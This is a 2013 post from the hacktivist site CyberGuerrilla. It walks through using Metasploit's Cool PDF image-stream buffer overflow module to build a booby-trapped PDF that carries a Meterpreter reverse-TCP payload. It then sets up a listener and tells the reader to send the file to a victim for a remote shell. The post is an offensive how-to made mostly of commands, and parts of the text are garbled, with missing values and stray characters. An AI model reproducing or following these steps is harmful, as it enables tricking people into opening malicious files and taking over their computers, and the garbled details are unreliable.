CyberGuerrilla 2013
 Vol.3--No.2013 | 7 Users Online
Saturday,Jan 18,2020 
By ro0ted avatar | December 12, 2013 - 02:38 | Posted in /b/ | Comments Off on #ro0ted Hacked Remote PC Using Cool PDF Image Stream Buffer Overflow

#ro0ted Hacked Remote PC Using Cool PDF Image Stream Buffer Overflow

This module exploits a stack buffer overflow in Cool PDF Reader prior to version The vulnerability is triggered when opening a malformed PDF file that contains a specially crafted image stream. This module has been tested successfully on Cool PDF over Windows XP SP3 and Windows 7 SP

Exploit Targets

Windows 7

Cool PDF

Attacker: Kali Linux

Victim PC: Windows 7

Open Kali Linux terminal type??msfconsole

Screenshot from 2013-11-15 04:09:31

Now type??use exploit/windows/fileformat/coolpdf_image_strem_bof

msf exploit??(coolpdf_image_strem_bof)>set payload windows/meterpreter/reverse_tcp

msf exploit (coolpdf_image_strem_bof)>set lhost of Local Host)

msf exploit (coolpdf_image_strem_bof)>exploit

Screenshot from 2013-12-11 17:35:21

After we successfully generate the malicious??s3m??File, it will stored on your local computer


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost


Now send your msf.pdf??files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

Screenshot from 2013-12-11 17:37:01Screenshot from 2013-12-11 17:38:04



(Visited 2 times, 1 visits today)

  • You can follow any responses to this entry through the RSS 2.0 feed.
  • Both comments and pings are currently closed.

Comments are closed.

Please note: Comment moderation is enabled and may delay your comment. There is no need to resubmit your comment.

nonymous. Whoever you are, we are ungovernable!
> =[]= This site is run by cyberguerrilla, your friendly anonymous autonomous tech collective since 2010 =[]= This the past that can NOT be changed! <